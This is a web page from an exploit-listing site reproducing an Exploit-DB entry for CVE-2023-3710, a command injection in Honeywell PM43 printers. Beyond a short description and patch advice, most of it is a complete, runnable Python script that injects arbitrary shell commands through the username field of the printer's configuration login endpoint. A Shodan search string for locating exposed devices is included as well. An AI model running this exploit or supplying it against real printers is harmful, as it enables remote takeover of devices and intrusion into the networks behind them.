Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Honeywell PM43 Command Injection Remote Code Execution (RCE) - exploit.company
header-logo
Suggest Exploit
vendor:
PM43 Printers
by:
ByteHunter
8.1
CVSS
CRITICAL
Remote Code Execution (RCE)
78
CWE
Product Name: PM43 Printers
Affected Version From: Prior to P10.19.050004
Affected Version To: Not specified
Patch Exists: YES
Related CWE: CVE-2023-3710
CPE: h:honeywell:pm43_firmware
Metasploit:
Other Scripts:
Platforms Tested: Not specified
Not specified

Honeywell PM43 Command Injection Remote Code Execution (RCE)

The exploit allows an attacker to remotely execute arbitrary code on Honeywell PM43 printers with firmware versions prior to P10.19.050004. By sending a crafted payload to the 'loadfile.lp?pageid=Configure' endpoint, an attacker can inject malicious commands. This vulnerability is identified as CVE-2023-3710.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware to version P10.19.050004 or later. Additionally, restrict network access to the printer and avoid exposing it directly to the internet.
Source

Exploit-DB raw data:

#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Frimware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710


import requests
import argparse

BLUE = '\033[94m'
YELLOW = '\033[93m'
RESET = '\033[0m'

def banner():
    banner = """
    ╔════════════════════════════════════════════════╗
        CVE-2023-3710   
        Command Injection in Honeywell PM43 Printers
        Author: ByteHunter      
    ╚════════════════════════════════════════════════╝
    """
    print(YELLOW + banner + RESET)


def run_command(url, command):
    full_url = f"{url}/loadfile.lp?pageid=Configure"
    payload = {
        'username': f'hunt\n{command}\n',
        'userpassword': 'admin12345admin!!'
    }
    try:
        response = requests.post(full_url, data=payload, verify=False)
        response_text = response.text
        html_start_index = response_text.find('<html>')
        if html_start_index != -1:
            return response_text[:html_start_index]
        else:
            return response_text  
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

def main():
    parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
    parser.add_argument('--url', dest='url', help='Target URL', required=True)
    parser.add_argument('--run', dest='command', help='Command to execute', required=True)

    args = parser.parse_args()

    response = run_command(args.url, args.command)
    print(f"{BLUE}{response}{RESET}")

if __name__ == "__main__":
    banner()
    main()

Navigation

Suggest Exploit

Services By CQR